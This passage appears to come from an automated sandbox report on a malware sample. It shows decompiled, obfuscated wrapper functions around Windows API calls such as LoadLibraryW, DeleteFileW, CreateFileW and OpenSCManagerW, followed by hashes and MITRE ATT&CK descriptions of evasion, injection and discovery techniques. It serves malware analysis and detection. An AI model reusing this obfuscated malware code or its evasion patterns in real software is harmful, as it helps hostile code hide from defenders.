				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E0419EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x041952c0
0x041952c3
0x041952c5
0x041952c8
0x041952cc
0x041952cd
0x041952d2
0x041952d9
0x041952e2
0x041952e9
0x041952f0
0x041952f7
0x041952fe
0x0419530a
0x0419530f
0x04195314
0x0419531b
0x0419531f
0x04195326
0x0419532d
0x04195337
0x0419533f
0x04195342
0x04195349
0x04195360
0x04195363
0x04195376
0x0419537f
0x04195385

APIs

LoadLibraryW.KERNEL32 ref: 0419537F

Strings

1, xrefs: 04195326
,*FV, xrefs: 041952F7
.9h, xrefs: 041952D9

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 1$,*FV$.9h
API String ID: 1029625771-1870595533
Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction ID: e83346ea71b275b30f2f2ec80cb23614f403b8c3338dcc8c8259a563805161c7
Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
Instruction Fuzzy Hash: F72156B5D00208FBEF08DFA8D98A9EEBBB5FB40304F108198E815A6250D3B46B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 041B1538, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E041B1538(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t59;
				int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_push(_a4);
				E041AFE29(_t59);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x73095a;
				_v28 = 0xd34a52;
				_v16 = 0xb3a153;
				_t77 = 0x73;
				_v16 = _v16 / _t77;
				_v16 = _v16 + 0x4fd2;
				_v16 = _v16 ^ 0xee3af97f;
				_v16 = _v16 ^ 0xee3510f4;
				_v20 = 0xee2064;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x88190a0a;
				_v12 = 0x72c7a5;
				_v12 = _v12 + 0x7839;
				_t78 = 0x77;
				_v12 = _v12 / _t78;
				_t79 = 0x76;
				_v12 = _v12 / _t79;
				_v12 = _v12 ^ 0x00040652;
				_v8 = 0x10c7fb;
				_t80 = 0x6c;
				_v8 = _v8 * 0x70;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t80;
				_v8 = _v8 ^ 0x00c83f8f;
				E0419EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
				_t75 = FindCloseChangeNotification(_a4); // executed
				return _t75;
			}

0x041b153e
0x041b1543
0x041b1548
0x041b154f
0x041b1558
0x041b155f
0x041b156b
0x041b1570
0x041b1575
0x041b157c
0x041b1583
0x041b158a
0x041b1591
0x041b1595
0x041b159c
0x041b15a3
0x041b15ad
0x041b15b2
0x041b15ba
0x041b15bf
0x041b15c4
0x041b15cb
0x041b15d6
0x041b15e6
0x041b15e9
0x041b15f3
0x041b15f6
0x041b160a
0x041b1615
0x041b161a

APIs

FindCloseChangeNotification.KERNEL32(00040652), ref: 041B1615

Strings

Zs, xrefs: 041B154F
d , xrefs: 041B158A

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID: Zs$d
API String ID: 2591292051-3879001491
Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction ID: da54f26ff0ebad8c6fe280ed775784a040d2268820b2fee276658e6509aef9ce
Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
Instruction Fuzzy Hash: 1B212AB5E40209EFEB04DFA5D94999EBBB1EB40314F10C099E618BB290D7B96B548F84

Uniqueness

Uniqueness Score: -1.00%

Function 0419D061, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0419D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t69;

				_push(_a12);
				_t69 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E041AFE29(_t54);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0xa62646;
				_v32 = 0x27199b;
				_v20 = 0x942c55;
				_v20 = _v20 | 0xf0368afe;
				_v20 = _v20 << 0xa;
				_v20 = _v20 ^ 0xfbcaf84d;
				_v20 = _v20 ^ 0x217d6c33;
				_v16 = 0xf28622;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 | 0xeb4a9877;
				_v16 = _v16 ^ 0x2aded5e4;
				_v16 = _v16 ^ 0xc19eb21f;
				_v12 = 0x4a5837;
				_v12 = _v12 ^ 0xa3e571b7;
				_v12 = _v12 + 0xffff6305;
				_t65 = 0x6e;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x01794185;
				_v8 = 0xa209ee;
				_v8 = _v8 + 0x62d2;
				_v8 = _v8 ^ 0x3d892cf6;
				_v8 = _v8 | 0x5ca7d1ce;
				_v8 = _v8 ^ 0x7da8dabc;
				E0419EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
				_t63 = DeleteFileW(_t69); // executed
				return _t63;
			}

0x0419d068
0x0419d06b
0x0419d06d
0x0419d070
0x0419d074
0x0419d075
0x0419d07a
0x0419d081
0x0419d087
0x0419d08e
0x0419d095
0x0419d09c
0x0419d0a3
0x0419d0a7
0x0419d0ae
0x0419d0b5
0x0419d0bc
0x0419d0c0
0x0419d0c7
0x0419d0ce
0x0419d0d5
0x0419d0dc
0x0419d0e3
0x0419d0ef
0x0419d0f7
0x0419d0fa
0x0419d101
0x0419d108
0x0419d10f
0x0419d116
0x0419d11d
0x0419d13c
0x0419d145
0x0419d14b

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0419D145

Strings

7XJ, xrefs: 0419D0D5
3l}!, xrefs: 0419D0AE

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: 3l}!$7XJ
API String ID: 4033686569-2205417827
Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction ID: 90240a7144fdaa1417fe2379c9f1a0be7b4676618b65a5027e4657db7c748806
Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
Instruction Fuzzy Hash: 1E2145B5D00318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 041B45CA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E041B45CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t51;
				void* _t60;
				WCHAR* _t64;

				_push(_a48);
				_t64 = __ecx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E041AFE29(_t51);
				_v28 = 0x204d4f;
				_v24 = 0;
				_v20 = 0xd27984;
				_v20 = _v20 | 0x43788b11;
				_v20 = _v20 ^ 0x43f3df42;
				_v16 = 0xf976f1;
				_v16 = _v16 + 0xffff3d74;
				_v16 = _v16 | 0xfc5c4419;
				_v16 = _v16 ^ 0xfcfdb6fc;
				_v12 = 0xb7df7c;
				_v12 = _v12 + 0xffff3658;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x1f30f970;
				_v12 = _v12 ^ 0x12ab006a;
				_v8 = 0x8ba8ca;
				_v8 = _v8 | 0x62aa166a;
				_v8 = _v8 + 0xa2f6;
				_v8 = _v8 * 0x55;
				_v8 = _v8 ^ 0xc33acf6c;
				E0419EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
				return _t60;
			}

0x041b45d2
0x041b45d7
0x041b45d9
0x041b45dc
0x041b45df
0x041b45e2
0x041b45e5
0x041b45e8
0x041b45eb
0x041b45ee
0x041b45f1
0x041b45f4
0x041b45f5
0x041b45f7
0x041b45f8
0x041b45fd
0x041b4607
0x041b460a
0x041b4611
0x041b4618
0x041b461f
0x041b4626
0x041b462d
0x041b4634
0x041b463b
0x041b4642
0x041b465d
0x041b4660
0x041b4667
0x041b466e
0x041b4675
0x041b467c
0x041b4688
0x041b468b
0x041b469e
0x041b46b5
0x041b46bc

APIs

CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 041B46B5

Strings

OM , xrefs: 041B45FD

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: OM
API String ID: 823142352-4198367855
Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction ID: d594ae3288ebc9988a15b6a18113a0599ce8a8010d8371da8cf3ab0e3a0e6b97
Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
Instruction Fuzzy Hash: C421EE72801249BBCF05DFA9CD45CDEBFB5EF88304F518199F915A6220D3768A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 041A648A, Relevance: 1.6, APIs: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E041A648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t49;
				long _t52;

				_push(_a16);
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E041AFE29(_t41);
				_v12 = 0x3cd3f;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0xc677f757;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0188bcff;
				_v20 = 0x40fc9e;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x040306b1;
				_v16 = 0x159e9f;
				_v16 = _v16 + 0xffffd0d5;
				_v16 = _v16 * 0x33;
				_v16 = _v16 ^ 0x04433238;
				_v8 = 0x8a430d;
				_v8 = _v8 + 0xffffdfbc;
				_v8 = _v8 | 0x5356d001;
				_v8 = _v8 + 0x638e;
				_v8 = _v8 ^ 0x53d0144a;
				E0419EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
				return _t49;
			}

0x041a6491
0x041a6494
0x041a6496
0x041a6499
0x041a649c
0x041a64a0
0x041a64a1
0x041a64a6
0x041a64b0
0x041a64b4
0x041a64bb
0x041a64bf
0x041a64c6
0x041a64cd
0x041a64d1
0x041a64d8
0x041a64df
0x041a64fa
0x041a64fd
0x041a6504
0x041a650b
0x041a6512
0x041a6519
0x041a6520
0x041a6534
0x041a6543
0x041a6549

APIs

RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 041A6543

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction ID: 43b605f82f5b10efc3423e5be8342fc93c119917aae91672a5aee17040f813a3
Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
Instruction Fuzzy Hash: D21100B6C0121DFBDF06DFA5D9498CEBBB4FB04314F108598E821A6250E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 041AE8B6, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E041AE8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t29;
				void* _t37;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E041AFE29(_t29);
				_v20 = 0xc8e76b;
				_v20 = _v20 | 0x270203a1;
				_v20 = _v20 ^ 0x27c97096;
				_v16 = 0x55aebc;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00171a80;
				_v12 = 0xfad6fe;
				_v12 = _v12 ^ 0xd14a4d1d;
				_v12 = _v12 ^ 0xd1b10da7;
				_v8 = 0x428060;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x15de1a76;
				E0419EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
				_t37 = OpenSCManagerW(0, 0, _a12); // executed
				return _t37;
			}

0x041ae8bd
0x041ae8c2
0x041ae8c5
0x041ae8c6
0x041ae8ca
0x041ae8cb
0x041ae8d0
0x041ae8da
0x041ae8e1
0x041ae8e8
0x041ae8ef
0x041ae8f3
0x041ae8fa
0x041ae901
0x041ae908
0x041ae90f
0x041ae92a
0x041ae92d
0x041ae941
0x041ae94e
0x041ae954

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 041AE94E

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction ID: 5a13a7af79474397abbfd6353aa3737f018c878ed28cf438656e7439ff6c37cb
Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
Instruction Fuzzy Hash: 1C11237190221DFB9B04EFE89D468DFBFB8FF04308F118588E825B2211D3B19B149BA5

Uniqueness

Uniqueness Score: -1.00%

Function 041AD11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E041AD11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E0419EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x041ad120
0x041ad124
0x041ad12b
0x041ad132
0x041ad139
0x041ad140
0x041ad144
0x041ad14b
0x041ad14f
0x041ad156
0x041ad15d
0x041ad164
0x041ad16b
0x041ad172
0x041ad176
0x041ad17d
0x041ad184
0x041ad18b
0x041ad1ac
0x041ad1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 041AD1B6

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 9e10a21073650c9ec998ad3c2b825507dcc3e5b31229064e446f552942c00e8b
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: D91112B1C4030CEBDB44DFE5D94A6DEFBB0EB00708F108588D521B6240D3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 041B061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E041B061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E041AFE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E0419EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x041b0624
0x041b0627
0x041b0629
0x041b062c
0x041b062f
0x041b0630
0x041b0631
0x041b0636
0x041b063d
0x041b0644
0x041b064b
0x041b064f
0x041b0667
0x041b066a
0x041b0671
0x041b0678
0x041b067f
0x041b068b
0x041b068e
0x041b0695
0x041b069c
0x041b06a3
0x041b06aa
0x041b06b1
0x041b06b8
0x041b06bf
0x041b06c6
0x041b06d9
0x041b06e5
0x041b06eb

APIs

lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 041B06E5

Memory Dump Source

Source File: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true

Associated: 00000005.00000002.353100530.0000000004190000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.353200232.00000000041B6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4190000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 4a38d7f6fec42d3058b0114352b364f064e4e9c7af95ebf245c6e290f9f17323
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: A42110B5C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A6251D3B49B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
